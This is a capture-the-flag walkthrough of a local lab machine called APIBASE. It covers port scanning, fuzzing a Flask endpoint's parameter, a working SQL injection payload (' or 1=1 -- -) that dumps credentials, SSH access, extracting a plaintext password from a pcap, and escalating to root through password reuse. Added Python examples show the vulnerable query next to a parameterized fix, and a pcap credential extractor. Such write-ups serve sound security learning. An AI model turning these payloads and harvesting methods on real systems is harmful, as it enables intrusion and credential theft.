APIBASE MACHINE
APIBASE
┌──(root㉿kali)-[/home/kali/Descargas]
└─# bash auto_deploy.sh apibase.tar
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
First, we check that the attacker machine can reach the vulnerable machine with ping. The replies come back in well under a millisecond with TTL 64, which fits a Linux container on the local Docker bridge:
┌──(root㉿kali)-[/home/kali/Descargas]
└─# ping -c3 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.066 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.066 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.067 ms
--- 172.17.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2039ms
rtt min/avg/max/mdev = 0.066/0.066/0.067/0.000 ms
Once the host answers, we run Nmap to find which services are exposed (-n skips DNS, -Pn skips host discovery, -sS is a SYN scan and -sV probes service versions; the last two need root). Two ports are open: 22 (SSH, OpenSSH 8.4p1 on Debian 11) and 5000 (HTTP, Werkzeug 1.0.1 on Python 3.9.2, i.e. a Flask-style development server, which usually means a small custom web application and is therefore the interesting target):
┌──(root㉿kali)-[/home/kali/Descargas]
└─# nmap -n -Pn -sS -sV -vvv 172.17.0.2 2>/dev/null
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-19 13:30 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 13:30
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 13:30, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:30
Scanning 172.17.0.2 [1000 ports]
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 5000/tcp on 172.17.0.2
Completed SYN Stealth Scan at 13:30, 0.04s elapsed (1000 total ports)
Initiating Service scan at 13:30
Scanning 2 services on 172.17.0.2
Completed Service scan at 13:30, 6.03s elapsed (2 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:30
Completed NSE at 13:30, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:30
Completed NSE at 13:30, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000080s latency).
Scanned at 2026-03-19 13:30:22 CET for 7s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u4 (protocol 2.0)
5000/tcp open http syn-ack ttl 64 Werkzeug httpd 1.0.1 (Python 3.9.2)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.51 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.036KB)
Now we browse to http://172.17.0.2:5000. The page only says "Please use /add to add a user or /users to query users".
Requesting /users on its own is rejected as an invalid parameter: the endpoint expects a query-string parameter, and we know neither its name nor any usernames, so we fuzz the parameter name.
We point dirb at http://172.17.0.2:5000/users? so that it appends each word of its wordlist to that base (/users?admin, /users?user, /users?username, ...) and reports the request the server answers differently:
┌──(root㉿kali)-[/home/kali/Descargas]
└─# dirb "http://172.17.0.2:5000/users?"
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Mar 19 13:35:42 2026
URL_BASE: http://172.17.0.2:5000/users?
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.17.0.2:5000/users? ----
+ http://172.17.0.2:5000/users?username (CODE:200|SIZE:39)
-----------------
END_TIME: Thu Mar 19 13:35:50 2026
DOWNLOADED: 4612 - FOUND: 1
Gotcha! The parameter is called username (only /users?username comes back with a 200). We still don't know any usernames, but the application's error output also reveals that there is an SQL database behind the endpoint, which suggests the value may be pasted straight into a query.
So we try a classic SQL injection in the URL: http://172.17.0.2:5000/users?username=prueba ' or 1=1 -- -
The single quote closes the string literal, or 1=1 makes the WHERE clause true for every row, and -- - comments out whatever the application appends after our input (the browser percent-encodes the spaces for us).
Gotcha! The query now returns every row of the users table, giving us a credential pair:
- user: pingu, password: pinguinasio
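To make the injection concrete, here is an added example (not the machine's app.py, which this write-up never shows) reconstructing the likely pattern behind /users?username=... against a constructed in-memory SQLite database with the same schema users.db turns out to have. build_db, query_users_vulnerable, query_users_safe, probe_for_sql_error and the extra alice row are assumptions of this example, not something taken from the box:

```python
import sqlite3


def build_db():
    """Constructed sample: same schema as users.db on the box (username TEXT, password TEXT).
    The pingu row is the one the injection reveals; alice is made up for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("pingu", "pinguinasio"), ("alice", "s3cret")])
    conn.commit()
    return conn


def query_users_vulnerable(conn, username):
    """Hypothetical reconstruction of the bug: the parameter value is pasted into the SQL
    text, so quotes inside it change the structure of the query."""
    sql = f"SELECT username, password FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def query_users_safe(conn, username):
    """Fixed version: the value travels as a bound parameter and can never become SQL."""
    sql = "SELECT username, password FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def probe_for_sql_error(conn, query_fn):
    """Error-based probe: a lone quote leaves the literal unbalanced in the vulnerable
    query, and the database error text is what tells the attacker 'this is SQL'.
    Returns the error message, or None when the input is handled safely."""
    try:
        query_fn(conn, "prueba'")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


PAYLOAD = "prueba ' or 1=1 -- -"   # the exact payload used in the write-up


if __name__ == "__main__":
    conn = build_db()
    print("probe:", probe_for_sql_error(conn, query_users_vulnerable))
    print("vulnerable:", query_users_vulnerable(conn, PAYLOAD))   # every row
    print("safe:", query_users_safe(conn, PAYLOAD))               # []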
Since SSH is open on port 22, we try these credentials there:
┌──(root㉿kali)-[/home/kali/Descargas]
└─# ssh pingu@172.17.0.2
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:UQP3sZ2M9Bu7kTQ1HO4SYadbMon/LNV+DBfYj4vF3vk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
pingu@172.17.0.2's password:
Linux 2f1607828f01 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
We now have a shell as pingu. Next comes privilege escalation to root, starting with the usual checks:
- sudo -l, to look for sudo rules we could abuse, but sudo is not even installed on the box.
- cd .. and ls, to look around outside the home directory. /home contains, next to pingu's own directory, files that clearly don't belong there:
- app.py
- network.pcap
- pingu
- users.db
pingu@2f1607828f01:~$ sudo -l
-bash: sudo: command not found
pingu@2f1607828f01:~$ cd ..
pingu@2f1607828f01:/home$ ls
app.py network.pcap pingu users.db
users.db is an SQLite database, so cat dumps it as binary; the readable fragments only show a users table with TEXT columns for the name and password and the pingu/pinguinasio row we already have, so nothing new there (sqlite3 users.db .dump or strings users.db would show the same more cleanly):
pingu@2f1607828f01:/home$ cat users.db
��q�AtableusersusersCREATE TABLE users
��#pingupinguinasiopingu@2f1607828f01:/home$ ^Came TEXT, password TEXT)
To analyse network.pcap on the attacker machine, we start the SSH service on Kali (192.168.88.5 here) so the file can be copied across with scp, and then check whether the capture contains a password in plaintext:
┌──(root㉿kali)-[/home/kali/Descargas]
└─# systemctl start ssh.service
┌──(root㉿kali)-[/home/kali/Descargas]
└─# systemctl status ssh.service
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/usr/lib/systemd/system/ssh.service; disabled; preset: disabled)
Active: active (running) since Thu 2026-03-19 13:46:33 CET; 3s ago
Invocation: 6dd6fe8b99dd481d89b87574f0ea18b9
Docs: man:sshd(8)
man:sshd_config(5)
Process: 45953 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
Main PID: 45955 (sshd)
Tasks: 1 (limit: 12711)
Memory: 2.4M (peak: 3M)
CPU: 32ms
CGroup: /system.slice/ssh.service
└─45955 "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
mar 19 13:46:33 kali systemd[1]: Starting ssh.service - OpenBSD Secure Shell server...
mar 19 13:46:33 kali sshd[45955]: Server listening on 0.0.0.0 port 22.
mar 19 13:46:33 kali sshd[45955]: Server listening on :: port 22.
mar 19 13:46:33 kali systemd[1]: Started ssh.service - OpenBSD Secure Shell server.
Now we copy the file from the target to Kali (the first password attempt is mistyped, the second one goes through):
pingu@2f1607828f01:/home$ scp network.pcap kali@192.168.88.5:/home/kali
The authenticity of host '192.168.88.5 (192.168.88.5)' can't be established.
ECDSA key fingerprint is SHA256:Sdw1IM59LaYzLtsf7+/EA7q3NygFUZ5cNYyQK0lHnKs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.88.5' (ECDSA) to the list of known hosts.
kali@192.168.88.5's password:
Permission denied, please try again.
kali@192.168.88.5's password:
network.pcap 100% 399 503.7KB/s 00:00
The file arrived in /home/kali:
┌──(root㉿kali)-[/home/kali]
└─# ls
api.py Documentos Imágenes network.pcap Público Vídeos
Descargas Escritorio Música Plantillas race.txt
Next, we open network.pcap in Wireshark and follow the TCP stream.
Gotcha! The capture contains an unencrypted login exchange, and the password balulero is sent in the clear.
The same ASCII strings are visible even with cat (strings network.pcap is the cleaner way), interleaved with the binary packet headers:
┌──(root㉿kali)-[/home/kali]
└─# cat network.pcap
���&�gVF((E(@"���P .�&�g@G((E(@O��P [�&�g�G((E(@"���P .�&�g3H33E3@"���P aRLOGIN root
&�g
I66E6@"���P ��PASS balulero
&�g�I66E6@O��P ��Access Denied
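Note that the server answered "Access Denied" to that attempt, so balulero did not work for whatever service was captured; a password found this way is still worth trying against the local accounts. For the capture step itself, here is an added example (my own code, not from the write-up or the machine) that parses a classic pcap file with only the Python standard library and pulls credential-looking lines out of the TCP payloads, which is what "follow TCP stream" does by hand. The capture it runs on is constructed inline to mirror the strings the real network.pcap shows (LOGIN root / PASS balulero / Access Denied); the addresses, ports, MACs and the keyword list are assumptions, and it deliberately skips real TCP reassembly by assuming segments were captured in order:

```python
import socket
import struct
from collections import defaultdict

PCAP_MAGIC_LE = 0xA1B2C3D4      # classic pcap, microsecond timestamps, little-endian
LINKTYPE_ETHERNET = 1


def build_sample_pcap(messages):
    """Constructed sample capture: one Ethernet/IPv4/TCP segment per
    (src, sport, dst, dport, payload). Checksums stay 0 (fine for parsing, not for
    replay); the MAC addresses are made up."""
    out = bytearray(struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET))
    next_seq = {}
    for i, (src, sport, dst, dport, payload) in enumerate(messages):
        flow = (src, sport, dst, dport)
        seq = next_seq.get(flow, 1000)
        next_seq[flow] = seq + len(payload)
        tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 0x50, 0x18, 65535, 0, 0) + payload
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), i, 0, 64, 6, 0,
                         socket.inet_aton(src), socket.inet_aton(dst)) + tcp
        eth = bytes.fromhex("0242ac110002") + bytes.fromhex("0242ac110001") + b"\x08\x00" + ip
        out += struct.pack("<IIII", 1700000000 + i, 0, len(eth), len(eth)) + eth
    return bytes(out)


def tcp_payloads(pcap_bytes):
    """Walk the file record by record and yield (src, sport, dst, dport, payload)
    for every IPv4/TCP segment that carries data."""
    magic, = struct.unpack_from("<I", pcap_bytes, 0)
    if magic == PCAP_MAGIC_LE:
        endian = "<"
    elif magic == 0xD4C3B2A1:          # same header written big-endian
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng and nanosecond variants not handled)")
    linktype, = struct.unpack_from(endian + "I", pcap_bytes, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24
    while off + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", pcap_bytes, off)
        off += 16
        frame = pcap_bytes[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # not IPv4
            continue
        ihl = (frame[14] & 0x0F) * 4
        total_len, = struct.unpack_from("!H", frame, 16)
        if frame[23] != 6:                                     # not TCP
            continue
        src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
        tcp_off = 14 + ihl
        sport, dport = struct.unpack_from("!HH", frame, tcp_off)
        data_off = (frame[tcp_off + 12] >> 4) * 4
        payload = frame[tcp_off + data_off:14 + total_len]
        if payload:
            yield src, sport, dst, dport, payload


CRED_KEYWORDS = (b"USER", b"PASS", b"LOGIN", b"Password")   # assumed list, extend as needed


def extract_credentials(pcap_bytes):
    """Concatenate each direction's payload in capture order (no real reassembly) and
    return (flow, line) pairs for lines that start with a credential keyword."""
    streams = defaultdict(bytearray)
    for src, sport, dst, dport, payload in tcp_payloads(pcap_bytes):
        streams[(src, sport, dst, dport)] += payload
    hits = []
    for (src, sport, dst, dport), data in streams.items():
        for raw in data.splitlines():
            line = raw.strip()
            if line.startswith(CRED_KEYWORDS):
                hits.append((f"{src}:{sport} -> {dst}:{dport}", line.decode("latin-1")))
    return hits


def passwords(pcap_bytes):
    """Only the values sent after PASS."""
    return [line.split(None, 1)[1] for _, line in extract_credentials(pcap_bytes)
            if line.startswith("PASS") and " " in line]


# Constructed sample mirroring the strings visible in the real network.pcap.
SAMPLE_PCAP = build_sample_pcap([
    ("172.17.0.1", 40000, "172.17.0.2", 23, b"LOGIN root\r\n"),
    ("172.17.0.1", 40000, "172.17.0.2", 23, b"PASS balulero\r\n"),
    ("172.17.0.2", 23, "172.17.0.1", 40000, b"Access Denied\r\n"),
])

if __name__ == "__main__":
    for flow, line in extract_credentials(SAMPLE_PCAP):
        print(flow, line)
    print("passwords:", passwords(SAMPLE_PCAP))
```

To run it on the real file, replace SAMPLE_PCAP with open("network.pcap", "rb").read(); for anything bigger than a toy capture, reach for tshark or Wireshark, which do proper stream reassembly and protocol dissection.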
Trying su root with the password balulero from the capture works (the root password had been reused), and we are root:
pingu@2f1607828f01:/home$ su root
Password:
root@2f1607828f01:/home# whoami
root
Thank you very much for reading this article.
I hope you liked it and learned something new.
This article was written for ethical purposes.
Happy hacking!